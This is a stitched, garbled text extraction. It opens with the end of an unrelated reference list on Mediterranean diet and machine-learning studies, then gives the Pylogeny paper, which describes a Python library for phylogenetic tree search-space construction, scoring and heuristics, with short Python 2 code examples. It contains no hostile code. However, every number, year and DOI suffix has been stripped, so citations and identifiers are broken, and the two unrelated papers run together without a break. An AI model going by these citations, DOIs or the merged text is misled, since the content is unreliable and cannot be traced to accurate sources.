http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.oftale. . . http://dx.doi.org/ . /j.clnu. . . http://dx.doi.org/ . / http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ syndrome in brca mutation carriers. integrative cancer therapies ( ): – doi . / . burges cjc. . a tutorial on support vector machines for pattern recognition. data mining and knowledge discovery ( ): – doi . /a: . careau v. . energy intake, basal metabolic rate, and within-individual trade-offs in men and women training for a half marathon: a reanalysis. physiological and biochemical zoology ( ): – doi . / . chrysohoou c, panagiotakos db, pitsavos c, das un, stefanadis c. . adherence to the mediterranean diet attenuates inflammation and coagulation process in healthy adults: the attica study. journal of the american college of cardiology ( ): – doi . /j.jacc. . . . corral s, gonzález m, pereña j, seisdedos n. . adaptación española del inventario de trastornos de la conducta alimentaria. madrid: tea. cortes c, vapnik v. . support-vector networks. machine learning : – . cristianini n, shawe-taylor j. . an introduction to support vector machines: and other kernel- based learning methods. new york: cambridge university press. cutillas ab, herrero e, de san eustaquio a, zamora s, pérez-llamas f. . prevalencia de peso insuficiente, sobrepeso y obesidad, ingesta de energía y perfil calórico de la dieta de estudiantes universitarios de la comunidad autónoma de la región de murcia (españa). nutricion hospitalaria ( ): – . de la montaña miguélez j, cobas n, rodríguez m, míguez bernárdez m, castro sobrino l. . adherencia a la dieta mediterranea y su relación con el índice de masa corporal en universiarios de galicia. nutrición clínica y dietética hospitalaria ( ): – . 
de viñaspre op, oronoz m. . snomed ct in a language isolate: an algorithm for a semiautomatic translation. bmc medical informatics and decision making (suppl. ):s doi . / - - -s -s . della camera pa, morselli s, cito g, tasso g, cocci a, laruccia n, travaglini f, del fabbro d, mottola ar, gacci m, serni s, carini m, natali a. . sexual health, adherence to mediterranean diet, body weight, physical activity and mental state: factors correlated to each other. urologia journal ( ): – doi . /uj. . downer mk, gea a, stampfer m, sánchez-tainta a, corella d, salas-salvadó j, ros e, estruch r, fitó m, gómez-gracia e, arós f, fiol m, de-la corte fjg, serra-majem l, pinto x, basora j, sorlí jv, vinyoles e, zazpe i, martínez-gonzález m-Á. . predictors of short- and long-term adherence with a mediterranean-type diet intervention: the predimed randomized trial. international journal of behavioral nutrition and physical activity ( ): doi . /s - - - . dussaillant c, echeverría g, inés urquiaga, nicolás velasco and attilio rigotti. . evidencia actual sobre los beneficios de la dieta mediterránea en salud. artículo de revisión rev med chilerev med chile ( ): – . díaz-uriarte r, de andrés sa. . gene selection and classification of microarray data using random forest. bmc bioinformatics ( ): doi . / - - - . espina a, ortego ma, de alda io, yenes f, aleman a. . la imagen corporal en los trastornos alimentarios. body shape in eating disorders ( ): – . estruch r, martínez-gonzález ma, corella d, salas-salvadó j, fitó m, chiva-blanch g, fiol m, gómez-gracia e, arós f, lapetra j, serra-majem l, pintó x, buil-cosiales p, sorlí jv, muñoz ma, basora-gallisá j, lamuela-raventós rm, serra-mir m, ros e. . effect of a high-fat mediterranean diet on bodyweight and waist circumference: a prespecified secondary arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /a: http://dx.doi.org/ . / http://dx.doi.org/ . /j.jacc. . . http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /uj. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ outcomes analysis of the predimed randomised controlled trial. lancet diabetes & endocrinology ( ): – doi . /s - ( ) - . estruch r, ros e, salas-salvadó j, covas m-i, corella d, arós f, gómez-gracia e, ruiz-gutiérrez v, fiol m, lapetra j, lamuela-raventos rm, serra-majem l, pintó x, basora j, muñoz ma, sorlí jv, martínez ja, martínez-gonzález ma. . primary prevention of cardiovascular disease with a mediterranean diet. new england journal of medicine ( ): . farias g, thieme rd, teixeira lm, heyde me, bettini s, radominski r. . nutrición hospitalaria trabajo original. nutricion hospitalaria ( ): – . fawcett t. . an introduction to roc analysis. pattern recognition letters ( ): – doi . /j.patrec. . . . fernandez-lozano c, gestal m, munteanu cr, dorado j, pazos a. a. a methodology for the design of experiments in computational intelligence with multiple regression models. peerj ( ):e doi . /peerj. . fernandez-lozano c, seoane j, gestal m, gaunt t, dorado j, pazos a, campbell c. b. texture analysis in gel electrophoresis images using an integrative kernel-based approach. scientific reports ( ): doi . /srep . finucane m, stevens g, cowan m, danaei g, lin jk, paciorek cj, singh gm, gutierrez hr, lu y, bahalim an, farzadfar f, riley lm, ezzati m. . 
national, regional, and global trends in body-mass index since : systematic analysis of health examination surveys and epidemiological studies with country. lancet ( ): – doi . /s - ( ) - . garner d. . edi- : inventario de trastornos de la conducta alimentaria: manual. madrid: tea. grao-cruces a, nuviala a, fernandez-martinez a, martinez-lopez e-j. . relationship of physical activity and sedentarism with tobacco and alcohol consumption, and mediterranean diet in spanish teenagers. nutricion hospitalaria ( ): – . hechenbichler k, schliep k. . weighted k-nearest-neighbor techniques and ordinal classification. collaborative research center , discussion paper . doi . /ubm/epub. . hu z, mao j-h, curtis c, huang g, gu s, heiser l, lenburg me, korkola je, bayani n, samarajiwa s, seoane ja, dane ma, esch a, feiler hs, wang nj, hardwicke ma, laquerre s, jackson j, wood kw, weber b, spellman pt, aparicio s, wooster r, caldas c, gray jw. . genome co-amplification upregulates a mitotic gene network activity that predicts outcome and response to mitotic protein inhibitors in breast cancer. breast cancer research ( ): doi . /s - - -y. estruch r, ros e, salas-salvadó j, covas mi, corella d, arós f, gómez-gracia e, ruiz-gutiérrez v, lapetra j, lamuela-raventos rm, serra-majem l, pintó x, basora j, muñoz ma, sorli jv, martinez ja, fitó m, gea a, hernan ma, martinez-gonzalez ma, for the predimed study investigators. . primary prevention of cardiovascular disease with a mediterranean diet supplemented with extra-virgin olive oil or nuts. new england journal of medicine ( ):e doi . /nejmoa . jover e. . Índice cintura/cadera—obesidad y riesgo cardiovascular. anales de medicina interna : – . kanjo e, younis e, sherkat n. . towards unravelling the relationship between on-body, environmental and emotion data using sensor information fusion approach. information fusion : – . arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /srep http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /ubm/epub. http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /nejmoa http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ kim j, bowlby r, mungall aj, robertson ag, odze rd, cherniack ad, shih j, pedamallu cs, cibulskis c, dunford a, meier sr, kim j, raphael bj, wu h-t, wong am, willis je, bass aj, derks s, garman k, mccall sj, wiznerowicz m, pantazi a, parfenov m, thorsson v, shmulevich i, dhankani v, miller m, sakai r, wang k, schultz n, shen r, arora a, weinhold n, sánchez-vega f, kelsen dp, zhang j, felau i, demchok j, rabkin cs, camargo mc, zenklusen jc, bowen j, leraas k, lichtenberg tm, curtis c, seoane ja, ojesina ai, beer dg, gulley ml, pennathur a, luketich jd, zhou z, weisenberger dj, akbani r, lee j-s, liu w, mills gb, zhang w, reid bj, hinoue t, laird pw, shen h, piazuelo mb, schneider bg, mclellan m, taylor-weiner a, cibulskis c, lawrence m, cibulskis k, stewart c, getz g, lander e, gabriel sb, ding l, mclellan md, miller ca, appelbaum el, cordes mg, fronick cc, fulton la, mardis er, wilson rk, schmidt hk, fulton rs, ally a, balasundaram m, bowlby r, carlsen r, chuah e, dhalla n, holt ra, jones sjm, kasaian k, brooks d, li hi, ma y, marra ma, mayo m, moore ra, mungall aj, mungall kl, robertson ag, schein je, sipahimalani p, tam a, thiessen n, wong t, cherniack ad, shih j, pedamallu cs, beroukhim r, bullman s, cibulskis c, murray ba, saksena g, schumacher se, gabriel s, meyerson m, hadjipanayis a, kucherlapati r, pantazi a, parfenov m, ren x, park pj, lee s, kucherlapati m, yang l, baylin sb, hoadley ka, weisenberger dj, bootwalla ms, lai ph, van den berg dj, berrios m, holbrook a, akbani r, hwang j-e, jang h-j, liu w, weinstein jn, lee j-s, lu y, sohn bh, mills g, seth s, protopopov a, bristow ca, mahadeshwar hs, tang j, song x, zhang j, laird pw, hinoue t, shen h, cho j, defrietas t, frazer s, gehlenborg n, heiman di, lawrence ms, lin p, meier sr, noble ms, voet d, zhang h, kim j, polak p, saksena g, chin l, getz g, wong am, raphael bj, wu h-t, lee s, park pj, yang l, thorsson v, bernard b, iype l, miller m, reynolds sm, shmulevich i, dhankani v, abeshouse a, arora a, armenia j, kundra r, ladanyi m, lehmann k-v, gao j, sander c, schultz n, sánchez-vega f, shen r, weinhold n, chakravarty d, zhang h, radenbaugh a, hegde a, akbani r, et al. . integrated genomic characterization of oesophageal carcinoma. nature ( ): – . krzysztoszek j, wierzejska e, zielińska a. . obesity: an analysis of epidemiological and prognostic research. archives of medical science ( ): – . lack g, fox d, northstone k, golding j. . factors associated with the development of peanut allergy in childhood. new england journal of medicine ( ): – . li x, li j, wu y. . a global optimization approach to multi-polarity sentiment analysis. plos one ( ): – . lópez-sobaler am, aparicio a, aranceta-bartrina j, gil Á, gonzález-gross m, serra-majem l, varela-moreiras g, ortega rm. . overweight and general and abdominal obesity in a representative sample of spanish adults: findings from the anibes study. biomed research international : . machado p, romero j, nadal m, santos a, correia j, carballal a. . computerized measures of visual complexity. acta psychologica : – doi . /j.actpsy. . . . martínez-gonzález ma, garcía-lópez m, bes-rastrollo m, toledo e, martínez-lapiscina eh, delgado-rodriguez m, vazquez z, benito s, beunza jj. . mediterranean diet and the incidence of cardiovascular disease: a spanish cohort. nutrition, metabolism and cardiovascular diseases ( ): – . martínez-gonzález ma, salas-salvadó j, estruch r, corella d, fitó m, ros e. . 
benefits of the mediterranean diet: insights from the predimed study. progress in cardiovascular diseases ( ): – doi . /j.pcad. . . . arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.actpsy. . . http://dx.doi.org/ . /j.pcad. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ marventano s, godos j, platania a, galvano f, mistretta a, grosso g. . mediterranean diet adherence in the mediterranean healthy eating, aging and lifestyle (meal) study cohort. international journal of food sciences and nutrition ( ): – . melaku ya, gill tk, taylor aw, adams r, shi z. . association between nutrient patterns and bone mineral density among ageing adults. clinical nutrition espen : – doi . /j.clnesp. . . . míguez bernárdez m, de la montaña miguélez j, gonzález carnero j, gonzález rodríguez m. . concordancia entre la autopercepción de la imagen corporal y el estado nutricional en universitarios de orense. nutricion hospitalaria ( ): – . norman k, smoliner c, valentini l, lochs h, pirlich m. . is bioelectrical impedance vector analysis of value in the elderly with malnutrition and impaired functionality? nutrition ( – ): – doi . /j.nut. . . . ortega anta rm, lópez sobaler am. . primeras jornadas ucm-asen avances y controversias en nutricion y salud. nutrición hospitalaria ( ): – . pons p, jaen j, catala a. . assessing machine learning classifiers for the detection of animals’ behavior using depth-based tracking. expert systems with applications : – doi . /j.eswa. . . . pérez c, aranceta j. . ¿es posible la dieta mediterránea en el siglo xxi? in: alonso e, varela g, silvestre d, eds. la dieta mediterránea en el marco de la nutrición comunitaria: luces y sombras. madrid: instituto tomás pascual sanz, – . pérez-caballero g, andrade j, olmos p, molina y, jiménez i, durán j, fernandez-lozano c, miguel-cruz f. . authentication of tequilas using pattern recognition and supervised classification. trac—trends in analytical chemistry : – . r core team. . r: a language and environment for statistical computing. vienna: the r foundation for statistical computing. available at http://www.r-project.org/. ravasco p, anderson h, mardones f. . métodos de valoración del estado nutricional. nutricion hospitalaria (suppl. ): – . rodriguez a, fernandez-lozano c, dorado j, rabuñal jr. . two-dimensional gel electrophoresis image registration using block-matching techniques and deformation models. analytical biochemistry : – doi . /j.ab. . . . rodriguez rodriguez e, lopez plaza b, lopez sobaler m, ortega r. . prevalencia de sobrepeso y obesidad en adultos españoles. nutricion hospitalaria ( ): – . rolland y, lauwers-cances v, cournot m, nourhashémi f, reynish w, rivière d, vellas b, grandjean h. . sarcopenia, calf circumference, and physical function of elderly women: a cross-sectional study. journal of the american geriatrics society ( ): – doi . /j. - . . .x. romero pérez a, rivas velasco a. . adherence to mediterranean diet and bone health. nutricion hospitalaria ( ): – . saeys y, inza i, larrañaga p. . a review of feature selection techniques in bioinformatics. bioinformatics ( ): – doi . /bioinformatics/btm . samworth rj. . optimal weighted nearest neighbour classifiers. annals of statistics ( ): – doi . / -aos . savanelli mc, barrea l, macchia pe, savastano s, falco a, renzullo a, scarano e, nettore ic, colao a, di somma c. . preliminary results demonstrating the impact of mediterranean diet on bone health. journal of translational medicine ( ): doi . /s - - -x. 
arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.clnesp. . . http://dx.doi.org/ . /j.nut. . . http://dx.doi.org/ . /j.eswa. . . http://www.r-project.org/ http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . / -aos http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ serra-majem l, roman b, estruch r. . scientific evidence of interventions using the mediterranean diet: a systematic review. nutrition reviews ( pt ):s –s doi . /j. - . .tb .x. shapira n. . the potential contribution of dietary factors to breast cancer prevention. european journal of cancer prevention ( ): – doi . /cej. . shapiro ss, wilk mb. . an analysis of variance test for normality (complete samples). biometrika ( – ): – doi . /biomet/ . - . . skoraczyñski g, dittwald p, miasojedow b, szymkuć s, gajewska ep, grzybowski ba, gambin a. . predicting the outcomes of organic reactions via machine learning: are current descriptors sufficient? scientific reports ( ): doi . /s - - - . sofi f, macchi c, abbate r, gensini gf, casini a. . mediterranean diet and health status: an updated meta-analysis and a proposal for a literature-based adherence score. public health nutrition ( ): – doi . /s . srivastava r, batra a, dhawan d, bakhshi s. . association of energy intake and expenditure with obesity: a cross-sectional study of pediatric patients following treatment for leukemia. pediatric hematology and oncology ( ): – doi . / . . . sámano r, rodríguez-ventura a, sánchez-jiménez b, godínez e, noriega a, zelonka r, garza m, nieto j. . satisfacción de la imagen corporal en adolescentes y adultos mexicanos y su relación con la autopercepción corporal y el índice de masa corporal real. nutricion hospitalaria ( ): – . Štefan l, Čule m, milinović i, sporiš g, juranko d. . the relationship between adherence to the mediterranean diet and body composition in croatian university students. european journal of integrative medicine (suppl. c): – . tibshirani r. . regression selection and shrinkage via the lasso. journal of the royal statistical society, series b (methodological) ( ): – . travé td, castroviejo a. . adherencia a la dieta mediterránea en la población universitaria. nutrición hospitalaria ( ): – . trichopoulou a. . traditional mediterranean diet and longevity in the elderly: a review. public health nutrition ( ): – doi . /phn . trichopoulou a, bamia c, norat t, overvad k, schmidt eb, tjonneland a, halkjær j, clavel-chapelon f, vercambre m-n, boutron-ruault m-c, linseisen j, rohrmann s, boeing h, weikert c, benetou v, psaltopoulou t, orfanos p, boffetta p, masala g, pala v, panico s, tumino r, sacerdote c, de-mesquita hbb, ocke mc, peeters ph, van der schouw yt, gonzález c, sanchez mj, chirlaque md, moreno c, larrañaga n, van guelpen b, jansson j-h, bingham s, khaw k-t, spencer ea, key t, riboli e, trichopoulos d. . modified mediterranean diet and survival after myocardial infarction: the epic-elderly study. european journal of epidemiology ( ): – doi . /s - - - . unesco. . the mediterranean diet inscription on the representative list of the intangible cultural heritage of humanity. available at https://ich.unesco.org/doc/src/ -en.pdf. vapnik vn. . the nature of statistical learning theory. new york: springer new york, inc. vert jp, tsuda k, schölkopf b. . a primer on kernel methods, kernel methods in computational biology. london: mit press, – . 
widmer rj, flammer aj, lerman lo, lerman a. . the mediterranean diet, its components, and cardiovascular disease. american journal of medicine ( ): – doi . /j.amjmed. . . .
zaragoza martí a, ferrer cascales r, cabañero martínez mj, hurtado sánchez ja, laguna pérez a. . adherencia a la dieta mediterránea y su relación con el estado nutricional en personas mayores. nutrición hospitalaria ( ): – .
zou h, hastie t. . regularization and variable selection via the elastic net. journal of the royal statistical society: series b statistical methodology ( ): – doi . /j. - . . .x.
pylogeny: an open-source python framework for phylogenetic tree reconstruction and search space heuristics

alexander safatli and christian blouin
faculty of computer science, dalhousie university, halifax, ns, canada; department of biochemistry and molecular biology, dalhousie university, halifax, ns, canada

submitted february, accepted june, published june. corresponding author: alexander safatli, safatli@cs.dal.ca. academic editor: keith crandall. additional information and declarations can be found at the end of the article. doi . /peerj-cs. copyright safatli and blouin, distributed under creative commons cc-by. open access.

abstract

summary. pylogeny is a cross-platform library for the python programming language that provides an object-oriented application programming interface for phylogenetic heuristic searches. its primary function is to permit both heuristic search and analysis of the phylogenetic tree search space, as well as to enable the design of novel algorithms to search this space. to this end, the framework supports the structural manipulation of phylogenetic trees, in particular using rearrangement operators such as nni, spr, and tbr, the scoring of trees using parsimony and likelihood methods, the construction of a tree search space graph, and the programmatic execution of a few existing heuristic programs. the library supports a range of common phylogenetic file formats and can be used for both nucleotide and protein data. furthermore, it is also capable of supporting gpu likelihood calculation on nucleotide character data through the beagle library.

availability. existing development and source code is available for contribution and for download by the public from github (http://github.com/alexsafatli/pylogeny). a stable release of this framework is available for download through pypi (python package index) at http://pypi.python.org/pypi/pylogeny.

subjects bioinformatics, computational biology
keywords phylogenetic, python, heuristic, alignment, maximum likelihood, library, combinatorial, programming, parsimony

introduction

there is a need for tree manipulation, scoring, and flexible heuristic designs as part of larger bioinformatics pipelines. introduced here is a cross-platform library called pylogeny intended for heuristic search and analysis of the phylogenetic tree search space, as well as the design of novel algorithms to search this space. this framework is written in the python programming language, yet it uses efficient auxiliary libraries to perform computationally expensive steps such as scoring.
as a programming interface, pylogeny addresses the needs of both researchers and programmers who are exploring the combinatorial problem associated with phylogenetic trees. the phylogenetic tree search space describes the combinatorial space of all possible phylogenetic trees for a set of operational taxonomic units. this forms a finite graph
where nodes represent tree solutions and edges represent rearrangement between two trees according to a given operator. operators include nearest neighbor interchange (nni), subtree prune and regraft (spr), and tree bisection and reconnection (tbr), most of which are implemented presently in pylogeny (felsenstein, ). these nodes can be evaluated for fitness against sequence data. we can also evaluate properties of the space such as the location of local and global maxima, and the quantity of the latter. the presence of multiple maxima is a confounding factor in heuristic searches which may lead to drawing incorrect conclusions on evolutionary histories.

the source code and library require only a small number of dependencies. python dependencies include numpy (walt, colbert & varoquaux, ), a ubiquitous numerical library, networkx (hagberg, schult & swart, ), a graph and network library, pandas (mckinney, ), a high-performance library for numerical data, and p4 (foster, ), a phylogenetic library. an additional required dependency is a c phylogenetic library called libpll, which underlies the raxml application and is used to score the likelihood of trees (stamatakis, ; flouri et al., ). optionally, the beagle (ayres et al., ) package can be used for scoring as well. most dependencies are automatically resolved by a single command when installing the package from the pypi package index. primary documentation is available on the library's website and alongside the library. all major classes and methods also possess documentation that can be accessed using a native command.

features

the functionality to maintain a phylogenetic landscape is implemented in the landscape class defined in the landscape module of this library. this object interacts with a large number of other classes and supports tree scoring using standard phylogenetic methods. many of the more relevant objects are tabulated and explained in table 1. a large amount of unit-test coverage has been applied to most of the major features, including tree rearrangement, heuristic exploration, and landscape construction.

the pylogeny library can read sequence alignments and character data in formats including fasta, nexus, and phylip. tree data can currently be read only in a single format, with future implementations to allow for a greater breadth of formats. persistence and management of character data is performed by an alignment module, while trees are stored by their representative string in a tree module. they can be instantiated into a richer topology object in order to manipulate and rearrange them.

phylogenetic tree manipulation and scoring

for the purposes of this framework, if instantiated into a topology object, phylogenetic trees are modelled in memory as rooted. therefore, manipulation and access of the tree components, such as nodes and edges, presupposes a rooted structure. unrooted trees, either multifurcating or bifurcating, can nevertheless still be output and read. support is also present for splits or bipartitions (as in the bipartition object) of these trees, required by many phylogenetic applications such as consensus tree generation (margush & mcmorris, ).

table 1. overview of the basic objects in the pylogeny library.
alignment (module alignment): represents a biological sequence alignment of character data to enable phylogenetic inference and other operations.
treebranch (module base): represents a branch in a tree structure, such as a phylogenetic tree, and its associated information.
treenode (module base): represents a node in a tree structure, such as a phylogenetic tree, and its associated information.
treestructure (module base): a collection of treenode and treebranch objects comprising a tree structure.
executable (module executable): an interface for the instantiation and running of a single call of some given binary application (in a unix shell).
heuristic (module heuristic): an interface for a heuristic that explores a state graph and all associated metadata.
graph (module landscape): represents a state graph.
landscape (module landscape): represents a phylogenetic tree search space, modelled as a graph.
vertex (module landscape): represents a single node in the phylogenetic landscape, associated with a tree, and adds convenient functionality to alias parent landscape functionality.
landscapewriter (module landscapewriter): allows one to write a landscape object to a file, including alignment and tree information.
landscapeparser (module landscapewriter): allows one to parse a landscape that was written to a file.
newickparser (module newick): allows one to parse a newick or new hampshire format string of characters representing a (phylogenetic) tree.
rearrangement (module rearrangement): represents a movement of a branch or node on one tree to another part of that same tree.
topology (module rearrangement): an immutable representation of a phylogenetic tree on which movements can be performed to construct new topology or tree objects.
bipartition (module tree): represents a bipartition of a phylogenetic tree. a branch in a phylogenetic tree defines a single bipartition that divides the tree into two disjoint sets of leaves.
tree (module tree): represents a phylogenetic tree which does not contain structural information and only defines features such as its newick string, fitness score, and origin.
treeset (module tree): represents an ordered, disorganized collection of trees that do not necessarily comprise a combinatorial space.

iterators can be created for visiting different elements in a tree. unrooting, rerooting, and other simple manipulation can also be performed on a tree. for more complex manipulation, rearrangement operators (using the rearrangement module) can be performed on a tree to convert it to another topology. to save memory and computation, rearrangements are not performed unless the resultant structure is requested; movement information is stored in a transient intermediate structure. this avoids large-scale instantiation of new topology objects when exploring the search space. scoring topologies using parsimony or likelihood is done by calling functions present in the library that wrap libpll or the high-performance beagle library. these software packages are written in c or c++, the latter of which allows for increased performance by using the graphics processing unit (gpu) found in a computer for processing.

tree search space graph construction and search

the tree search space is abstracted as a graph on which a number of graph algorithms and analyses can be performed. we do this by utilizing routines found in the networkx library, which has an efficient implementation of the graph in c. accessing elements of the graph can be done by iteration or by node name, and properties of the space can be identified by function.
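to make the graph abstraction concrete, the following is a minimal, self-contained sketch (not pylogeny's own api) of how a tree search space can be represented with networkx: newick strings act as node names, each node carries a fitness score, and edges connect trees that are one rearrangement apart. the newick strings, the score values, and the score_tree helper are hypothetical placeholders.

import networkx as nx

def score_tree(newick):
    # placeholder scoring function; a real pipeline would call a
    # likelihood or parsimony scorer (e.g., libpll or beagle) here.
    return -float(len(newick))

# hypothetical trees, each one rearrangement away from the first.
trees = ["((a,b),(c,d));", "((a,c),(b,d));", "((a,d),(b,c));"]

space = nx.Graph()
for t in trees:
    # each node is keyed by its newick string and stores a fitness score.
    space.add_node(t, score=score_tree(t))

# connect the starting tree to its two rearrangement neighbours.
space.add_edge(trees[0], trees[1])
space.add_edge(trees[0], trees[2])

# a single greedy step: move to the best-scoring neighbour if it improves.
current = trees[0]
best = max(space.neighbors(current), key=lambda n: space.nodes[n]["score"])
if space.nodes[best]["score"] > space.nodes[current]["score"]:
    current = best
print(current, space.nodes[current]["score"])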
exploring the space is done by performing rearrangements on trees as topology objects, where the methods of exploration include a range of enumeration and stochastic sampling approaches. in order to make newick strings consistent amongst trees in a phylogenetic tree search space, an arbitrary but efficient rooting strategy is used to avoid redundancy. rearranging trees in the search space reroots the resultant trees to the lexicographically lowest-order taxon name. this means that different rearrangements that lead to the same topology, with a possibly different ordering of leaves, can still be recognized as not being a new addition to the space. restriction of this exploration is supported by allowing limitations on movement, for example by disallowing the breaking of certain bipartitions.

a minimal example to demonstrate constructing a landscape from an alignment file, and finding trees in the space, is found below. the landscape is initialized with a single tree corresponding to an approximate maximum likelihood tree as determined using the fasttree executable (price, dehal & arkin, ).

from pylogeny.alignment import *
from pylogeny.landscape import landscape

# open an alignment compatible with the strict phylip format.
ali = phylipfriendlyalignment('al.fasta')
starttree = ali.getapproxmltree()

# create the landscape with a root tree.
lscape = landscape(ali, starting_tree=starttree, root=True)

# explore around that tree.
trees = lscape.exploretree(lscape.getroot())

the variable trees now holds a list of integers. these integers correspond to the names of new trees that have populated our landscape object. these new trees comprise the neighbors of the starting tree, a tree found using fasttree. one could now query the landscape object for new information, such as listing these neighbors or writing all of the newick strings of these trees.

# see trees around the starting tree.
for i in trees:  # iterate over these.
    # print their newick strings.
    print lscape.gettree(i)

applying search space heuristics

performing a heuristic search of the combinatorial space comprised by a phylogenetic landscape can be done with relative ease using this library. not only can the heuristic's steps be later analysed, the resulting space that is explored can also be later viewed and investigated for its properties. the heuristic module has a number of already defined approximate methods to discover the global maximum of the space, and with an understanding of the object hierarchy, one can create one's own.

as an example, one could perform a greedy hill-climbing heuristic on the search space by comparing the trees' parsimony scores. to do this, one would instantiate a parsimonygreedy object from the heuristic module and provide an existing landscape and a tree in that landscape to initiate the climb. the minimal code to achieve a search from the initial tree would be:

from pylogeny.alignment import alignment
from pylogeny.landscape import landscape
from pylogeny.heuristic import parsimonygreedy

# ali = open an alignment file.
# lscape = construct a landscape.
# ...
h = parsimonygreedy(lscape, lscape.getrootnode())
h.explore()

we have applied a heuristic to the landscape, which has populated it with new trees. nothing is returned here. in order to investigate what new trees have been added, we can query the heuristic object.
furthermore, we can access these new trees from the landscape object.

newtrees = h.getpath()  # list of tree names.
for name in newtrees:  # visit all trees found by heuristic.
    tree = lscape.gettree(name)
    print tree.getscore()  # print scores.

existing phylogenetic and heuristic programs

the library supports executing other software on its objects. implementations are present in the framework to call on the fasttree (price, dehal & arkin, ) and raxml heuristics for finding an approximate maximum likelihood tree. there is also an implementation for the use of treepuzzle (schmidt et al., ) and consel (shimodaira & hasegawa, ) in order to acquire a confidence interval of trees as defined by the approximately unbiased (au) test (shimodaira, ). further implementations can be created by extending a base interface found in the library. an example of code to demonstrate the use of consel, to generate a confidence interval of trees with default settings, is as follows.

from pylogeny.alignment import alignment
from pylogeny.executable import consel

# ali = open an alignment file.
# trees = a set of trees (e.g., a landscape).
# ...
autest = consel(trees, ali, 'autestname')
interval = autest.getinterval()

we now have a treeset, or collection, of tree objects assigned to the variable interval which have been deemed to be significant and relevant.

other libraries

other python libraries that perform similar tasks to this framework include dendropy (sukumaran & holder, ), ete, and the p4 phylogenetic library. elements of alignment management and tree manipulation are present in all three of these libraries, but none of them allow for the manipulation and heuristic search of a combinatorial space of phylogenetic trees. there remains a deficiency for this functionality across many languages, python included. despite this, this framework can serve to work alongside such libraries for further power. dendropy possesses a number of metrics and other tree operations that are not present in pylogeny; this library supports translating its tree structure to the structure found in dendropy, so those operations can still be accessed. similarly, ete allows for a number of rich visualization techniques not possible with this framework that can also be accessed in such a manner. a small part of the pylogeny library is built on the p4 phylogenetic library, and p4 performs a number of operations that are found in this framework, such as scoring and manipulation of trees. we, however, did not find p4 as flexible an api, as it appears to be designed for scripting and for work in a terminal rather than as a component of a larger application. for example, p4 likelihood calculations are printed to the standard output rather than returned from a function.

acknowledgements

the authors thank professor r. beiko and the members of dr. beiko's lab at dalhousie university for some helpful suggestions. the members of the blouin lab are also acknowledged for helpful comments and critical review of this manuscript.

additional information and declarations

funding

this work was supported by nserc discovery grant no. . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures the following grant information was disclosed by the authors: nserc discovery: . competing interests the authors declare there are no competing interests. author contributions • alexander safatli performed the experiments, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • christian blouin reviewed drafts of the paper, provided advice and supervision. data deposition the following information was supplied regarding the deposition of related data: github: https://github.com/alexsafatli/pylogeny. references ayres dl, darling a, zwickl dj, beerli p, holder mt, lewis po, huelsenbeck jp, ronquist f, swofford dl, cummings mp, rambaut a, suchard ma. . beagle: an application programming interface and high-performance computing library for statistical phylogenetics. systematic biology ( ): – doi . /sysbio/syr . felsenstein j. . inferring phylogenies. vol. . sunderland: sinauer associates. flouri t, izquierdo-carrasco f, darriba d, aberer a, nguyen l-t, minh b, von haeseler a, stamatakis a. . the phylogenetic likelihood library. systematic biology doi . /sysbio/syu . foster pg. . modeling compositional heterogeneity. systematic biology ( ): – doi . / . hagberg aa, schult da, swart pj. . exploring network structure, dynamics, and function using networkx. in: proceedings of the th python in science conference (scipy ), pasadena, ca, usa, – . margush t, mcmorris fr. . consensus n-trees. bulletin of mathematical biology ( ): – . mckinney w. . data structures for statistical computing in python. in: van der walt s, millman j, eds. proceedings of the th python in science conference. – . price mn, dehal ps, arkin ap. . fasttree –approximately maximum-likelihood trees for large alignments. plos one ( ):e doi . /journal.pone. . schmidt ha, strimmer k, vingron m, von haeseler a. . tree-puzzle: maximum likelihood phylogenetic analysis using quartets and parallel computing. bioinformatics ( ): – doi . /bioinformatics/ . . . shimodaira h. . an approximately unbiased test of phylogenetic tree selection. systematic biology ( ): – doi . / . shimodaira h, hasegawa m. . consel: for assessing the confidence of phylogenetic tree selection. bioinformatics ( ): – doi . /bioinformatics/ . . . safatli and blouin ( ), peerj comput. sci., doi . /peerj-cs. 
stamatakis a. . raxml version : a tool for phylogenetic analysis and post-analysis of large phylogenies. bioinformatics doi . /bioinformatics/btu .

sukumaran j, holder mt. . dendropy: a python library for phylogenetic computing. bioinformatics ( ): – doi . /bioinformatics/btq .

walt svd, colbert sc, varoquaux g. . the numpy array: a structure for efficient numerical computation. computing in science & engineering ( ): – doi . /mcse. . .

international journal of advanced network, monitoring and controls volume , no. , doi: .
